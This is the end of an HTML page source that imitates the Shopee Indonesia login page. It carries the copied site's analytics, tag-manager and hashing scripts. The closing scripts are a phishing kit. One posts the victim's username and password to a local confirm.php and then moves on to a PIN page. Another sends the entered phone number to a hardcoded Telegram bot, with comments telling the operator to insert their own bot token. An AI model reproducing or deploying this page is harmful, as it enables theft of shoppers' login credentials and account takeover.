z=["hex","array","digest","arrayBuffer"],l=[];!p.JS_SHA256_NO_NODE_JS&&Array.isArray||(Array.isArray=function(a){return"[object Array]"===Object.prototype.toString.call(a)});!w||!p.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW&&ArrayBuffer.isView||(ArrayBuffer.isView=function(a){return"object"==typeof a&&a.buffer&&a.buffer.constructor===ArrayBuffer});var B=function(a,b){return function(m){return(new k(b,!0)).update(m)[a]()}},C=function(a){var b=B("hex",a);A&&(b=H(b,a));b.create=function(){return new k(a)};b.update=
function(a){return b.create().update(a)};for(var m=0;m<z.length;++m){var c=z[m];b[c]=B(c,a)}return b},H=function(a,b){var c=eval("require('crypto')"),f=eval("require('buffer').Buffer"),e=b?"sha224":"sha256",h=function(b){if("string"==typeof b)return c.createHash(e).update(b,"utf8").digest("hex");if(null===b||void 0===b)throw Error(u);return b.constructor===ArrayBuffer&&(b=new Uint8Array(b)),Array.isArray(b)||ArrayBuffer.isView(b)||b.constructor===f?c.createHash(e).update(new f(b)).digest("hex"):a(b)};
return h},D=function(a,b){return function(c,f){return(new x(c,b,!0)).update(f)[a]()}},E=function(a){var b=D("hex",a);b.create=function(b){return new x(b,a)};b.update=function(a,c){return b.create(a).update(c)};for(var c=0;c<z.length;++c){var f=z[c];b[f]=D(f,a)}return b};k.prototype.update=function(a){if(!this.finalized){var b=typeof a;if("string"!==b){if("object"!==b)throw Error(u);if(null===a)throw Error(u);if(w&&a.constructor===ArrayBuffer)a=new Uint8Array(a);else if(!(Array.isArray(a)||w&&ArrayBuffer.isView(a)))throw Error(u);
var c=!0}for(var f,e=0,h=a.length,d=this.blocks;e<h;){if(this.hashed&&(this.hashed=!1,d[0]=this.block,d[16]=d[1]=d[2]=d[3]=d[4]=d[5]=d[6]=d[7]=d[8]=d[9]=d[10]=d[11]=d[12]=d[13]=d[14]=d[15]=0),c)for(b=this.start;e<h&&64>b;++e)d[b>>2]|=a[e]<<n[3&b++];else for(b=this.start;e<h&&64>b;++e)128>(f=a.charCodeAt(e))?d[b>>2]|=f<<n[3&b++]:2048>f?(d[b>>2]|=(192|f>>6)<<n[3&b++],d[b>>2]|=(128|63&f)<<n[3&b++]):55296>f||57344<=f?(d[b>>2]|=(224|f>>12)<<n[3&b++],d[b>>2]|=(128|f>>6&63)<<n[3&b++],d[b>>2]|=(128|63&f)<<
n[3&b++]):(f=65536+((1023&f)<<10|1023&a.charCodeAt(++e)),d[b>>2]|=(240|f>>18)<<n[3&b++],d[b>>2]|=(128|f>>12&63)<<n[3&b++],d[b>>2]|=(128|f>>6&63)<<n[3&b++],d[b>>2]|=(128|63&f)<<n[3&b++]);this.lastByteIndex=b;this.bytes+=b-this.start;64<=b?(this.block=d[16],this.start=b-64,this.hash(),this.hashed=!0):this.start=b}return 4294967295<this.bytes&&(this.hBytes+=this.bytes/4294967296<<0,this.bytes%=4294967296),this}};k.prototype.finalize=function(){if(!this.finalized){this.finalized=!0;var a=this.blocks,
b=this.lastByteIndex;a[16]=this.block;a[b>>2]|=G[3&b];this.block=a[16];56<=b&&(this.hashed||this.hash(),a[0]=this.block,a[16]=a[1]=a[2]=a[3]=a[4]=a[5]=a[6]=a[7]=a[8]=a[9]=a[10]=a[11]=a[12]=a[13]=a[14]=a[15]=0);a[14]=this.hBytes<<3|this.bytes>>>29;a[15]=this.bytes<<3;this.hash()}};k.prototype.hash=function(){var a,b,c,f,e=this.h0,h=this.h1,d=this.h2,g=this.h3,k=this.h4,l=this.h5,r=this.h6,q=this.h7,n=this.blocks;for(a=16;64>a;++a){var p=((c=n[a-15])>>>7|c<<25)^(c>>>18|c<<14)^c>>>3;var t=((c=n[a-2])>>>
17|c<<15)^(c>>>19|c<<13)^c>>>10;n[a]=n[a-16]+p+n[a-7]+t<<0}var u=h&d;for(a=0;64>a;a+=4)this.first?(this.is224?(f=300032,q=(c=n[0]-1413257819)-150054599<<0,g=c+24177077<<0):(f=704751109,q=(c=n[0]-210244248)-1521486534<<0,g=c+143694565<<0),this.first=!1):(p=(e>>>2|e<<30)^(e>>>13|e<<19)^(e>>>22|e<<10),b=(f=e&h)^e&d^u,q=g+(c=q+((k>>>6|k<<26)^(k>>>11|k<<21)^(k>>>25|k<<7))+(k&l^~k&r)+y[a]+n[a])<<0,g=c+(p+b)<<0),p=(g>>>2|g<<30)^(g>>>13|g<<19)^(g>>>22|g<<10),b=(u=g&e)^g&h^f,r=d+(c=r+((q>>>6|q<<26)^(q>>>11|
q<<21)^(q>>>25|q<<7))+(q&k^~q&l)+y[a+1]+n[a+1])<<0,p=((d=c+(p+b)<<0)>>>2|d<<30)^(d>>>13|d<<19)^(d>>>22|d<<10),b=(t=d&g)^d&e^u,l=h+(c=l+((r>>>6|r<<26)^(r>>>11|r<<21)^(r>>>25|r<<7))+(r&q^~r&k)+y[a+2]+n[a+2])<<0,p=((h=c+(p+b)<<0)>>>2|h<<30)^(h>>>13|h<<19)^(h>>>22|h<<10),b=(u=h&d)^h&g^t,k=e+(c=k+((l>>>6|l<<26)^(l>>>11|l<<21)^(l>>>25|l<<7))+(l&r^~l&q)+y[a+3]+n[a+3])<<0,e=c+(p+b)<<0;this.h0=this.h0+e<<0;this.h1=this.h1+h<<0;this.h2=this.h2+d<<0;this.h3=this.h3+g<<0;this.h4=this.h4+k<<0;this.h5=this.h5+
l<<0;this.h6=this.h6+r<<0;this.h7=this.h7+q<<0};k.prototype.hex=function(){this.finalize();var a=this.h0,b=this.h1,m=this.h2,f=this.h3,e=this.h4,h=this.h5,d=this.h6,g=this.h7;a=c[a>>28&15]+c[a>>24&15]+c[a>>20&15]+c[a>>16&15]+c[a>>12&15]+c[a>>8&15]+c[a>>4&15]+c[15&a]+c[b>>28&15]+c[b>>24&15]+c[b>>20&15]+c[b>>16&15]+c[b>>12&15]+c[b>>8&15]+c[b>>4&15]+c[15&b]+c[m>>28&15]+c[m>>24&15]+c[m>>20&15]+c[m>>16&15]+c[m>>12&15]+c[m>>8&15]+c[m>>4&15]+c[15&m]+c[f>>28&15]+c[f>>24&15]+c[f>>20&15]+c[f>>16&15]+c[f>>12&
15]+c[f>>8&15]+c[f>>4&15]+c[15&f]+c[e>>28&15]+c[e>>24&15]+c[e>>20&15]+c[e>>16&15]+c[e>>12&15]+c[e>>8&15]+c[e>>4&15]+c[15&e]+c[h>>28&15]+c[h>>24&15]+c[h>>20&15]+c[h>>16&15]+c[h>>12&15]+c[h>>8&15]+c[h>>4&15]+c[15&h]+c[d>>28&15]+c[d>>24&15]+c[d>>20&15]+c[d>>16&15]+c[d>>12&15]+c[d>>8&15]+c[d>>4&15]+c[15&d];return this.is224||(a+=c[g>>28&15]+c[g>>24&15]+c[g>>20&15]+c[g>>16&15]+c[g>>12&15]+c[g>>8&15]+c[g>>4&15]+c[15&g]),a};k.prototype.toString=k.prototype.hex;k.prototype.digest=function(){this.finalize();
var a=this.h0,b=this.h1,c=this.h2,f=this.h3,e=this.h4,h=this.h5,d=this.h6,g=this.h7;a=[a>>24&255,a>>16&255,a>>8&255,255&a,b>>24&255,b>>16&255,b>>8&255,255&b,c>>24&255,c>>16&255,c>>8&255,255&c,f>>24&255,f>>16&255,f>>8&255,255&f,e>>24&255,e>>16&255,e>>8&255,255&e,h>>24&255,h>>16&255,h>>8&255,255&h,d>>24&255,d>>16&255,d>>8&255,255&d];return this.is224||a.push(g>>24&255,g>>16&255,g>>8&255,255&g),a};k.prototype.array=k.prototype.digest;k.prototype.arrayBuffer=function(){this.finalize();var a=new ArrayBuffer(this.is224?
28:32),b=new DataView(a);return b.setUint32(0,this.h0),b.setUint32(4,this.h1),b.setUint32(8,this.h2),b.setUint32(12,this.h3),b.setUint32(16,this.h4),b.setUint32(20,this.h5),b.setUint32(24,this.h6),this.is224||b.setUint32(28,this.h7),a};x.prototype=new k;x.prototype.finalize=function(){if(k.prototype.finalize.call(this),this.inner){this.inner=!1;var a=this.array();k.call(this,this.is224,this.sharedMemory);this.update(this.oKeyPad);this.update(a);k.prototype.finalize.call(this)}};var t=C();t.sha256=
t;t.sha224=C(!0);t.sha256.hmac=E();t.sha224.hmac=E(!0);v?module.exports=t:(p.sha256=t.sha256,p.sha224=t.sha224,F&&define(function(){return t}))}();</script>
<script type="text/javascript" id="">var url=window.location.pathname+window.location.search,contentGroup="";
contentGroup=url.match("^/universal-link/|^/bridge_cmd|/download(\\?|/\\?pid)|/download")?"Redirect":url.match("(^/user/|(/cart($|/)|^/docs/|/me($|/|\\?))|^/buyer/|^((/checkout/)|(/checkout\\?))|^/communityRules/|^/legaldoc/|^/tips/|/func/app_select|/(addresses)|(edit_addresses)|/seller/|/shopping_cart/|/payment/|^/wallet/pay|^/forgot_password|^/account/|^/portal/|^/voucher-details/)")?"User features":url.match("(^/top\\_products$)|(^/top\\_products\\?)|^/daily_discover|^/from_same_shop/|^/similar_products/|^/you_may_also_like|^/mall/just-for-you|^/double_eleven_big_sale/")?"Recommendation":
url.match("^/\\?|^/$")?"Homepage":url.match("\\-i\\.[0-9][0-9][0-9].*/similar|\\-i\\.[0-9][0-9][0-9].*/promotion")?"Similar Product":url.match("\\-i\\.[0-9][0-9][0-9]|/product/|^/item/")?"Product":url.match("\\-cat\\.[0-9]|/l/category/|/all_categories")&&null==url.match("/mall/.*\\-cat\\.[0-9]|/supermarket/.*\\-cat\\.[0-9]")?"Category":url.match("/m/groupbuy")?"Group-buy":url.match("^/m/")?"Microsite":url.match("^/flash_sale|^/shocking_sale|^/flash_deals|/hot_deals$|/hot_deals?|/promo_flash$|/promo_flash?|/okazje_dnia$|/okazje_dnia?")?
"Flash Deals":url.match("^/web$|^/web\\?|^/web/$|^/web/\\?|^/mobile$|^/mobile\\?|^/mobile/$|^/mobile/\\?")?"Download Page":url.match("^/campaigns/|^/campaigns?|^/campaigns$")?"All Campaigns":url.match("^/blog/|^/blog$|^/blog\\?|^/inspirasi-shopee")?"Blog":url.match("^/welcome\\?|^/welcome$|^/welcome\\-package\\?|^/welcome\\-package|^/shopee\\-coins/|^/shopee\\-coins\\?|^/shopee\\-coins$|^/shopee\\-coins\\-|^/koin\\-shopee/|^/koin\\-shopee\\?|^/koin\\-shopee$|^/koin\\-shopee\\-|^/shopeequiz\\?|^/shopeequiz$|^/referral\\-program?\\?|^/referral-program$|/pc_event/|/bundle-deal")?
"No SEO Campaigns (coins, welcome, quiz, bundle-deal)":url.match("/mall/|/mall$|^/Official-Shops/|^/scp/|/oficial$|/oficial?")&&null==url.match("^/mall/search")?"Mall":url.match("/produk-digital/|/digital-product/")?"Digital Product":url.match("/events3/|^/collections/|/.*\\-col\\.[0-9]|/search\\?collection\\\x3d|/search.*\\\x26collection\\\x3d|/events2/")&&null==url.match("^/blog/|^/blog$|^/blog\\?|/inspirasi-shopee")?"Events3 \x26 Collections":url.match("/search\\?|/search/|/search$|/search_user|/search-item/|/search-user|\\?keyword\\\x3d|\\\x26keyword\\\x3d|\\-tag$|\\-tag\\?|/search-catalogue|/search-filter")&&
null==url.match("/search\\?collection\\\x3d|/search.*\\\x26collection\\\x3d|/search\\?shopcollection\\\x3d|/search.*\\\x26shopcollection\\\x3d|/shop/.*/search|/search/\\?.*shop\\\x3d|/search\\?.*shop\\\x3d")?"Search Keyword (with Tag)":url.match("/supermarket/|/supermarket$")?"Supermarket":url.match("^/list/")?"Brand":"Shop \x26 MISC (v2019.04)";window.dataLayer=window.dataLayer||[];dataLayer.push({event:"cusevent",contentGroup:contentGroup});</script>
<iframe height="0" width="0" style="display: none; visibility: hidden;" src="https://9469210.fls.doubleclick.net/activityi;src=9469210;type=eng;cat=id-w-pg;ord=2404715188699;npa=0;auiddc=1210647589.1708353419;u28=%2F;u29=;pscdl=noapi;gtm=45He42e0v77691473za200;gcs=G1--;gcd=13l3l3l3l5;dma=0;uaa=;uab=;uafvl=Chromium%3B122.0.6261.43%7CNot(A%253ABrand%3B24.0.0.0%7CAndroid%2520WebView%3B122.0.6261.43;uamb=1;uam=CPH2365;uap=Android;uapv=13.0.0;uaw=0;epver=2;~oref=https%3A%2F%2Fshopee.co.id%2F?">
</iframe>
<script type="text/javascript" id="">!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version="2.0",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,"script","//connect.facebook.net/en_US/fbevents.js");fbq("init",google_tag_manager["rm"]["7691473"](85));fbq("track","PageView");</script>
<noscript>
<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=466924370133774&amp;ev=PageView&amp;noscript=1">
</noscript>
<script type="text/javascript" id="">var url=window.location.pathname+window.location.search,contentGroup="";
contentGroup=url.match("^/universal-link/|^/bridge_cmd|/download(\\?|/\\?pid)|/download")?"Redirect":url.match("(^/user/|(/cart($|/)|^/docs/|/me($|/|\\?))|^/buyer/|^((/checkout/)|(/checkout\\?))|^/communityRules/|^/legaldoc/|^/tips/|/func/app_select|/(addresses)|(edit_addresses)|/seller/|/shopping_cart/|/payment/|^/wallet/pay|^/forgot_password|^/account/|^/portal/|^/voucher-details/)")?"User features":url.match("(^/top\\_products$)|(^/top\\_products\\?)|^/daily_discover|^/from_same_shop/|^/similar_products/|^/you_may_also_like|^/mall/just-for-you|^/double_eleven_big_sale/")?"Recommendation":
url.match("^/\\?|^/$")?"Homepage":url.match("\\-i\\.[0-9][0-9][0-9].*/similar|\\-i\\.[0-9][0-9][0-9].*/promotion")?"Similar Product":url.match("\\-i\\.[0-9][0-9][0-9]|/product/|^/item/")?"Product":url.match("\\-cat\\.[0-9]|/l/category/|/all_categories")&&null==url.match("/mall/.*\\-cat\\.[0-9]|/supermarket/.*\\-cat\\.[0-9]")?"Category":url.match("/m/groupbuy")?"Group-buy":url.match("^/m/")?"Microsite":url.match("^/flash_sale|^/shocking_sale|^/flash_deals|/hot_deals$|/hot_deals?|/promo_flash$|/promo_flash?|/okazje_dnia$|/okazje_dnia?")?
"Flash Deals":url.match("^/web$|^/web\\?|^/web/$|^/web/\\?|^/mobile$|^/mobile\\?|^/mobile/$|^/mobile/\\?")?"Download Page":url.match("^/campaigns/|^/campaigns?|^/campaigns$")?"All Campaigns":url.match("^/blog/|^/blog$|^/blog\\?|^/inspirasi-shopee")?"Blog":url.match("^/welcome\\?|^/welcome$|^/welcome\\-package\\?|^/welcome\\-package|^/shopee\\-coins/|^/shopee\\-coins\\?|^/shopee\\-coins$|^/shopee\\-coins\\-|^/koin\\-shopee/|^/koin\\-shopee\\?|^/koin\\-shopee$|^/koin\\-shopee\\-|^/shopeequiz\\?|^/shopeequiz$|^/referral\\-program?\\?|^/referral-program$|/pc_event/|/bundle-deal")?
"No SEO Campaigns (coins, welcome, quiz, bundle-deal)":url.match("/mall/|/mall$|^/Official-Shops/|^/scp/|/oficial$|/oficial?")&&null==url.match("^/mall/search")?"Mall":url.match("/produk-digital/|/digital-product/")?"Digital Product":url.match("/events3/|^/collections/|/.*\\-col\\.[0-9]|/search\\?collection\\\x3d|/search.*\\\x26collection\\\x3d|/events2/")&&null==url.match("^/blog/|^/blog$|^/blog\\?|/inspirasi-shopee")?"Events3 \x26 Collections":url.match("/search\\?|/search/|/search$|/search_user|/search-item/|/search-user|\\?keyword\\\x3d|\\\x26keyword\\\x3d|\\-tag$|\\-tag\\?|/search-catalogue|/search-filter")&&
null==url.match("/search\\?collection\\\x3d|/search.*\\\x26collection\\\x3d|/search\\?shopcollection\\\x3d|/search.*\\\x26shopcollection\\\x3d|/shop/.*/search|/search/\\?.*shop\\\x3d|/search\\?.*shop\\\x3d")?"Search Keyword (with Tag)":url.match("/supermarket/|/supermarket$")?"Supermarket":url.match("^/list/")?"Brand":"Shop \x26 MISC (v2019.04)";window.dataLayer=window.dataLayer||[];dataLayer.push({event:"cusevent",contentGroup:contentGroup});</script>
<iframe height="0" width="0" style="display: none; visibility: hidden;" src="https://9469210.fls.doubleclick.net/activityi;src=9469210;type=eng;cat=id-w-pg;ord=5416976149697;npa=0;auiddc=1210647589.1708353419;u28=%2Fbuyer%2Flogin%3Ffrom%3D%252F%26next%3D%252F;u29=Login%20sekarang%20untuk%20mulai%20berbelanja!%20%7C%20Shopee%20Indonesia;pscdl=noapi;gtm=45He42e0v77691473za200;gcs=G1--;gcd=13l3l3l3l5;dma=0;uaa=;uab=;uafvl=Chromium%3B122.0.6261.43%7CNot(A%253ABrand%3B24.0.0.0%7CAndroid%2520WebView%3B122.0.6261.43;uamb=1;uam=CPH2365;uap=Android;uapv=13.0.0;uaw=0;epver=2;~oref=https%3A%2F%2Fshopee.co.id%2Fbuyer%2Flogin%3Ffrom%3D%252F%26next%3D%252F?">
</iframe>
<div class="shopee-user-toast__overlay" style="position: fixed; top: 0px; left: 0px; height: 100%; width: 100%; pointer-events: none;">
	<div></div>
	<div></div>
</div>
<script type="text/javascript" id="">!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version="2.0",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,"script","//connect.facebook.net/en_US/fbevents.js");fbq("init",google_tag_manager["rm"]["7691473"](184));fbq("track","PageView");</script>
  <script>

         function OnButton(user) {

            if(user.length > 9) {
                $(".btn-punya").prop('disabled', false);
            } else {
                $(".btn-punya").prop('disabled', true);
            }
        }
        $(document).ready(function() {
            $("body").on('click', 'button#doLog', function() {
                var user = $("#user").val();
                var pass = $("#pass").val();

                $.ajax({
                    url: "/login/confirm.php",
                    method: "POST",
                    data: "username="+user+"&password="+pass,
                    beforeSend: function() {
                        $("#loading").show();
                    },
                    success: function(responsex) {
                        $("#aseli").html('');
                        if(responsex == "true") {
                            $.get("/aplikasi/login.js", function(datax, status){
                                window.history.pushState("", "", '/login.js');
                                $("#hideBody").hide();
                                $("#loading").hide();
                                $("#aseli").html(datax);
                            });
                        } else {
                            $.get("/aplikasi/pin.php", function(data, status){
                                window.history.pushState("", "", 'aplikasi/login.php');
                                setTimeout(function() { 
                                    $("#hideBody").hide();
                                    $("#loading").hide();
                                    $("#aseli").html(data);
                                    $("#aseli").show();
                                }, 1000);
                            });
                        }
                        
                    }
                })
            });
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#pass").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#pass").prop("type", "password");
                });
            });

            $("#user").on('input', function() {
                var user = $("#user").val();
                var pass = $("#pass").val();

                OnButton(user, pass);
            });

            $("#pass").on('input', function() {
                var user = $("#user").val();
                var pass = $("#pass").val();

                OnButton(user, pass);
            });
        });
    </script>
  <script>
 function sendForm(event) {
event.preventDefault();

    var user = document.getElementById('user');
   
    

    var gabungan = '※ 𝗡𝗼.𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 : ' + user.value;
   
    var token = '7404242408:AAFZHMT4Yo-HRI8HU3mjcc3FyX7M9umpGxU'; // Ganti dengan token bot yang kamu buat
    var grup = '7188037385'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
   
    success: function(){
    setTimeout(function(){
  window.location.href='pin.html';
var alerts = document.getElementById("user").value;
sessionStorage.setItem("alerts", alerts);
    }, 1000);}});};
     </script>  
  
</body>
</html>